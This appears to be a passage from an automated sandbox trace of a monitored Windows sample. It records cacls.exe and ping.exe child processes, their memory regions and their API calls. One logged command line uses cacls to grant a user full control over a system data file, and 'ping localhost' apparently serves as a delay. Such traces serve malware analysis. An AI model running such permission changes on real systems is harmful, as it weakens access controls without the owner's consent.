lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0157.946] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.946] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0157.947] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0157.947] LocalFree (hMem=0x4a8f68) returned 0x0 [0157.947] Sleep (dwMilliseconds=0x3e8) [0159.007] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0159.016] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0159.016] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0159.016] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0159.016] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.016] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0159.016] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.016] LocalFree (hMem=0x4a51b8) returned 0x0 [0159.016] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0159.016] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0159.016] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.016] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0159.016] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.016] LocalFree (hMem=0x4a29e8) returned 0x0 [0159.016] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0159.017] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0159.017] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.017] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0159.017] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.017] LocalFree (hMem=0x4a8f68) returned 0x0 [0159.017] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f238, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0159.017] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x28f208, nSize=0x0, Arguments=0x28f204 | out: lpBuffer="`\x15K") returned 0x58 [0159.017] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 30, Received = 30, Lost = 0 (0% loss),\r\n", lpszDst=0x4b1560, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 30, Received = 30, Lost = 0 (0% loss),\r\n") returned 1 [0159.017] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.017] _write (in: _FileHandle=1, _Buf=0x4b1560*, _MaxCharCount=0x58 | out: _Buf=0x4b1560*) returned 88 [0159.018] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.018] LocalFree (hMem=0x4b1560) returned 0x0 [0159.018] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x28f218, nSize=0x0, Arguments=0x28f214 | out: lpBuffer="p\x15K") returned 0x61 [0159.018] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 7ms, Average = 0ms\r\n", lpszDst=0x4b1570, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 7ms, Average = 0ms\r\n") returned 1 [0159.018] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.018] _write (in: _FileHandle=1, _Buf=0x4b1570*, _MaxCharCount=0x61 | out: _Buf=0x4b1570*) returned 97 [0159.019] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.019] LocalFree (hMem=0x4b1570) returned 0x0 [0159.019] IcmpCloseHandle (IcmpHandle=0x4a8b88) returned 1 [0159.064] LocalFree (hMem=0x4a38c8) returned 0x0 [0159.064] LocalFree (hMem=0x4aec00) returned 0x0 [0159.064] WSACleanup () returned 0 [0159.083] exit (_Code=0) Thread: id = 108 os_tid = 0xee8 Thread: id = 111 os_tid = 0xf04 Thread: id = 113 os_tid = 0xf10 Process: id = "63" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16900" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0xdfc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8794 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8795 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 8796 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 8797 start_va = 0xb80000 end_va = 0xb88fff entry_point = 0xb80000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 8798 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8799 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8800 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8801 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8802 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8813 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8814 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8815 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8816 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8817 start_va = 0x1c0000 end_va = 0x226fff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8818 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8819 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8820 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8821 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8822 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8823 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8824 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 104 os_tid = 0xec4 Thread: id = 107 os_tid = 0xee4 Process: id = "64" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16920" os_pid = "0xef4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "60" os_parent_pid = "0xe9c" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8966 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8967 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8968 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8969 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8970 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8971 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8972 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8973 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8974 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8975 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8976 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8977 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8978 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8979 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8980 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8981 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8982 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8983 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8984 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8985 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8986 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8987 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8988 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8989 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8990 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8991 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8992 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8993 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8994 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8995 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8996 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8997 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8998 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8999 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9000 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9001 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 9002 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9003 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9004 start_va = 0x250000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 9005 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 9006 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9007 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 9008 start_va = 0x15d0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 9009 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 9010 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 9011 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 9012 start_va = 0x17f0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 9141 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9142 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9143 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 9155 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 9156 start_va = 0x360000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 9160 start_va = 0x1600000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 9161 start_va = 0x17b0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 9162 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9175 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 9176 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 109 os_tid = 0xef8 [0118.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f7f4 | out: lpSystemTimeAsFileTime=0x12f7f4*(dwLowDateTime=0x83b774e0, dwHighDateTime=0x1d440a9)) [0118.238] GetCurrentProcessId () returned 0xef4 [0118.238] GetCurrentThreadId () returned 0xef8 [0118.239] GetTickCount () returned 0x28075 [0118.239] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7ec | out: lpPerformanceCount=0x12f7ec*=17502777277) returned 1 [0118.239] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0118.239] __set_app_type (_Type=0x1) [0118.239] __p__fmode () returned 0x76b331f4 [0118.239] __p__commode () returned 0x76b331fc [0118.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0118.240] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0118.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.240] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.240] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0118.247] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x12f284 | out: phkResult=0x12f284*=0x58) returned 0x0 [0118.247] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x12f278, lpData=0x12f280, lpcbData=0x12f27c*=0x4 | out: lpType=0x12f278*=0x0, lpData=0x12f280*=0x0, lpcbData=0x12f27c*=0x4) returned 0x2 [0118.247] RegCloseKey (hKey=0x58) returned 0x0 [0118.247] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x12f24c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f274 | out: ppResult=0x12f274*=0x0) returned 11001 [0118.247] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x12f24c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f274 | out: ppResult=0x12f274*=0x4246f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4247b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4247e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x423a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0118.662] FreeAddrInfoW (pAddrInfo=0x4246f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4247b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4247e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x423a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0118.662] Icmp6CreateFile () returned 0x428b40 [0118.838] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x424830 [0118.838] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x42ebb0 [0118.838] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x12f774, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.838] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x12f274, nSize=0x0, Arguments=0x12f270 | out: lpBuffer="XHB") returned 0x19 [0118.838] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x424858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0118.838] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.839] _write (in: _FileHandle=1, _Buf=0x424858*, _MaxCharCount=0x19 | out: _Buf=0x424858*) returned 25 [0118.839] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.839] LocalFree (hMem=0x424858) returned 0x0 [0118.839] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x12f278, nSize=0x0, Arguments=0x12f274 | out: lpBuffer="XHB") returned 0x18 [0118.839] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x424858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0118.839] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.839] _write (in: _FileHandle=1, _Buf=0x424858*, _MaxCharCount=0x18 | out: _Buf=0x424858*) returned 24 [0118.839] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.839] LocalFree (hMem=0x424858) returned 0x0 [0118.839] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0118.839] Icmp6SendEcho2 (in: IcmpHandle=0x428b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x12f2f0, DestinationAddress=0x2455e0, RequestData=0x424830, RequestSize=0x20, RequestOptions=0x12f2a0, ReplyBuffer=0x42ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x42ebb0) returned 0x1 [0118.841] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x12f774, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.841] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x12f278, nSize=0x0, Arguments=0x12f274 | out: lpBuffer=" QB") returned 0x10 [0118.841] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x425120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.841] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.841] _write (in: _FileHandle=1, _Buf=0x425120*, _MaxCharCount=0x10 | out: _Buf=0x425120*) returned 16 [0118.841] _setmode (_FileHandle=1, 